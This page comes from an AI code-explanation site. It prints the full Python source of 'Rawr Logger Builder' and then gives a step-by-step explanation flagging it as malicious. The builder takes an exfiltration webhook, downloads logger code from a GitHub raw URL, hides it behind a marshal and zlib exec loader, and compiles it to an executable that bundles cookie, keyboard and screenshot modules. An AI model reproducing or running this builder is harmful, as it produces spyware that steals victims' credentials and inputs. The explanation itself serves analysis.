This code appears to be a script aimed at creating...

September 1, 2025 at 07:13 PM

import marshal import zlib import os import time try: import requests from pystyle import * os.system('pip install pyinstaller') except: print("Installing Requirements For You") os.system('pip install requests') os.system('pip install pyinstaller') os.system('pip install pystyle') print("Please Rerun The Program") time.sleep(1) os.system(f'cls & title Rawr Logger Builder!') Write.Print(Center.XCenter(""" ____ __ / __ \____ __ _______ / / ____ ____ _____ ____ _____ / /_/ / __ `/ | /| / / ___/ / / / __ \/ __ `/ __ `/ _ \/ ___/ / _, _/ /_/ /| |/ |/ / / / /___/ /_/ / /_/ / /_/ / __/ / /_/ |_|\__,_/ |__/|__/_/ /_____/\____/\__, /\__, /\___/_/ /____//____/ Made By Jose#0001,TheSoap1#9870 \n"""), Colors.green_to_yellow, interval=0) webhook = Write.Input("\nEnter webhook URL:", Colors.green_to_yellow, interval=0.01) r = requests.get(webhook) if r.status_code == 200: Write.Print("Webhook Is Working\n",Colors.white_to_green, interval=0.01) time.sleep(1) else: Write.Print("Webhook Is Not Working\n",Colors.white_to_red, interval=0.01) time.sleep(3) exit() name = Write.Input("Enter File Name:", Colors.green_to_yellow, interval=0.01) code = requests.get("https://raw.githubusercontent.com/Joseloll/Rawr-Logger/main/main.py") with open(f"{name}.py", 'w', encoding='utf8') as f: f.write(code.text.replace("Webhooksss", webhook)) Write.Print("Rawr Logger Was SucessFully Built\n",Colors.white_to_green, interval=0.01) prot = Write.Input(f"Adding Protection Now To {name} Also Click Enter To Contine",Colors.white_to_green, interval=0.01) with open(f'{name}.py') as fi: pro = fi.read() mar = marshal.dumps(pro) zlb = zlib.compress(mar) with open(f"{name}.py", 'w') as f: f.write(f"import marshal,zlib;exec(marshal.loads(zlib.decompress({zlb})))") compile = Write.Input("Would You Like To Complie To A Exe y/n:", Colors.green_to_yellow, interval=0.01) if compile == "y": os.system(f'pyinstaller --onefile --hidden-import="requests" --hidden-import="os" --hidden-import="socket" --hidden-import="threading" --hidden-import="platform" --hidden-import="json" --hidden-import="browser_cookie3" --hidden-import="cv2" --hidden-import="re" --hidden-import="uuid" --hidden-import="keyboard" --hidden-import="Chrome" --hidden-import="psutil" --hidden-import="sys" --hidden-import="pynput" --hidden-import="uuid" --hidden-import="PIL" --hidden-import="PIL.ImageGrab" --hidden-import="browser_history" --hidden-import="win32api" {name}.py') os.remove(f'{name}.spec') Write.Print(f"{name} Was SucessFully Complied In Dist Folder\n",Colors.white_to_green, interval=0.01) time.sleep(2) Write.Print("This Program Will Now Exit In 3 Secs Thank You For Using Rawr Logger\n",Colors.white_to_green, interval=0.01) time.sleep(3) exit() elif compile == "n": Write.Print("Thank You For Using Rawr Logger\n",Colors.white_to_green, interval=0.01) time.sleep(3) exit()

This code appears to be a script aimed at creating a keylogger or malicious program generator, referred to as "Rawr Logger Builder." Here's what the code does step by step:

  1. Library Imports and Environment Setup:

    • Imports Python modules like marshal, zlib, os, time, requests, and pystyle.
    • Tries to ensure the required libraries (requests, pystyle, and pyinstaller) are installed, and auto-installs them if missing.
  2. Command Line Interface (CLI):

    • Displays a styled ASCII art banner using pystyle.Center to make the script look professional.
    • Prompts the user to input:
      • A webhook URL.
      • A name for the output file.
  3. Webhook Validation:

    • Sends a request (requests.get) to the provided webhook URL to verify its validity.
    • If it works (returns HTTP status 200), it proceeds. If not, the program exits.
  4. Retrieves Logger Code:

    • Downloads Python code for a logger from a remote URL on GitHub (https://raw.githubusercontent.com/Joseloll/Rawr-Logger/main/main.py).
    • Saves this code into a local Python file whose name is based on the user input.
    • Replaces a placeholder text in the remote code (Webhooksss) with the provided webhook URL.
  5. Adds "Protection" via Obfuscation:

    • Reads the downloaded logger code and obfuscates it by:
      • Serializing the code via marshal.dumps.
      • Compressing it using zlib.compress.
      • Rewriting the file such that it uses marshal and zlib to decode and execute the original script dynamically.
  6. Optional Compilation to Executable:

    • Prompts the user to decide whether to compile the Python file into an executable:
      • If the user says "yes," it uses pyinstaller to compile the obfuscated Python script into a standalone executable, hiding required imports.
    • Upon successful compilation, removes unnecessary build artifacts and informs the user.
  7. Exit:

    • The script displays a "thank you" message and closes itself.

Malicious Intent:

This script helps create an executable keylogger by:

  • Generating a logger program designed to send data (likely stolen user inputs or credentials) to a specified webhook URL.
  • Obfuscating the logger code through marshal and zlib to deter reverse engineering.
  • Providing an option to compile the keylogger into a standalone executable for easier distribution.

NOTE: This code appears to facilitate malicious activities (e.g., creating spyware or keylogging programs). Developing, distributing, using, or aiding the creation of malicious software is unethical and could lead to severe legal consequences. Always ensure your code complies with ethical guidelines and laws.

Generate your own explanations
Download our vscode extension
Read other generated explanations

Built by @thebuilderjr
Sponsored by beam analytics
Read our terms and privacy policy
Forked from openai-quickstart-node